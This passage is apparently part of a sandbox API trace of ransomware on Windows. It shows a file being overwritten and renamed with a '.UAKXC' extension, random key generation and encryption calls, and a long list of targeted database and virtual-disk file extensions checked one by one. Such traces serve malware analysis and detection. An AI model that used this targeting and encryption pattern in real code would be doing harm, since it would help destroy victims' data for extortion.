lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x4dd, lpOverlapped=0x0) returned 1 [0140.291] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffb23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.291] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x4dd, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x4dd, lpOverlapped=0x0) returned 1 [0140.291] CloseHandle (hObject=0x210) returned 1 [0140.293] GetProcessHeap () returned 0xea0000 [0140.293] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0140.293] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini") returned="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" [0140.293] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.UAKXC" [0140.293] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini.uakxc")) returned 1 [0140.294] GetProcessHeap () returned 0xea0000 [0140.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0140.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed0f8 | out: hHeap=0xea0000) returned 1 [0140.294] Sleep (dwMilliseconds=0x1f4) [0140.878] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0140.878] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0140.878] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0140.879] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn")) returned 0x2022 [0140.945] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.945] GetLastError () returned 0x0 [0140.945] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=326) returned 1 [0140.945] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.945] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.946] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.947] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.948] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.951] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.952] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.953] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.954] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.955] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft 